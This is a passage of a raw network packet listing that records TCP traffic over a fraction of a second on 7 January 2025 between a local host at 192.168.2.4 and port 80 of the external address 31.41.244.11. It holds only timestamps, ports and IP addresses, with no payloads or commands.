Jan 7, 2025 10:09:03.068353891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.068363905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.068372965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.068373919 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.068439960 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.100905895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.100953102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.100965023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101051092 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101062059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101073980 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101089954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101150990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101151943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101150990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101150990 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101164103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101176023 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101190090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101191044 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101202965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101210117 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101233006 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101242065 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101244926 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101257086 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101273060 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101303101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101313114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101313114 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101327896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101341009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101355076 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101367950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101389885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101416111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101428986 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101439953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101452112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101464033 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101469040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101473093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101516008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101516008 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101552010 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101563931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101574898 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101586103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101617098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101630926 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101650953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101663113 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101675034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101686001 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101696014 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101711035 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101737976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101761103 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101773977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101775885 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101790905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101840973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101866007 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101870060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101882935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101895094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101907015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101917982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101937056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101938963 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101948977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.101979971 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.101989985 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102010965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102102041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102114916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102125883 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102137089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102149963 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102166891 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102168083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102168083 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102181911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102212906 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102266073 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102278948 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102289915 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102299929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102310896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102319002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102324009 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102335930 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102348089 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102377892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102391958 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102410078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102422953 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102437019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102454901 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102499962 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102514982 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102528095 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102538109 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102550030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102566957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102574110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102585077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102596045 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102602005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102618933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102658987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102658987 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102672100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102713108 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102731943 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102802992 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102816105 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102827072 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102838993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102849960 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102861881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102865934 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102883101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102895021 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102900982 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102909088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102910995 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102922916 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.102967024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.102977991 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.103015900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.103033066 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.103050947 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.103064060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.103072882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.103072882 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.103074074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.103102922 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.103142977 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.103176117 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.103188038 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.103198051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.103207111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.103240013 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.103265047 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.130085945 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130136013 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130152941 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130201101 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130213022 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130223036 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130229950 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.130259037 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130271912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130311966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.130311966 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.130330086 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.130419970 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130433083 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130443096 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130454063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130465984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130477905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130489111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.130496025 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.130532980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.130604029 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.133145094 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.133156061 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.133173943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.133189917 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.133200884 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.133212090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.133219004 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.133255005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.133299112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.155164957 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.155177116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.155195951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.155205965 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.155215979 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.155227900 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.155240059 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.155244112 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.155330896 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.187736988 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187747955 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187815905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187827110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187838078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187876940 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187890053 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187913895 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187925100 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187938929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.187993050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.187993050 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188009977 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188024044 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188035011 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188052893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188064098 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188067913 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188076973 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188076019 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188106060 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188117027 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188133001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188149929 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188162088 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188173056 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188175917 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188208103 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188219070 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188230991 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188236952 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188241005 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188251019 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188266993 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188282967 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188293934 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188306093 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188328028 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188349009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188383102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188385010 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188396931 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188409090 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188420057 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188465118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188468933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188468933 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188477039 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188488007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188498974 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188538074 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188543081 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188555956 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188558102 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188568115 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188611984 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188612938 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188613892 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188623905 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188637972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188649893 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188661098 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188688040 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188715935 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188718081 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188729048 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188740015 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188751936 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188776016 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188797951 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188803911 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188810110 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188822985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188839912 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188858986 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188903093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188903093 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.188973904 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188986063 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.188997030 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189012051 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189023972 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189030886 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189035892 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189070940 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189104080 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189148903 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189162016 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189172029 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189183950 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189189911 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189207077 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189218998 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189224005 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189230919 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189237118 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189243078 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189248085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189265966 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189275980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189275980 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189277887 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189291954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189302921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189313889 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189327002 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189327002 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189377069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189377069 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189419985 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189431906 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189443111 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189454079 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189465046 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189474106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189477921 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189496040 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189502001 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189507961 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189521074 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189546108 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189568043 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189568996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189568996 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.189587116 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.189611912 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.191140890 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.216984034 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217022896 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217035055 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217046976 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217077017 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217082024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217082024 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217155933 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217175007 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217187881 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217187881 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217200041 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217200041 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217221022 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217232943 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217245102 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217256069 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217258930 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217268944 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217289925 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217308998 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217353106 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.217370987 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217381954 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.217422009 CET	50017	80	192.168.2.4	31.41.244.11
Jan 7, 2025 10:09:03.219901085 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.219921112 CET	80	50017	31.41.244.11	192.168.2.4
Jan 7, 2025 10:09:03.219933033 CET	80	50017	31.41.244.11	192.168.2.4
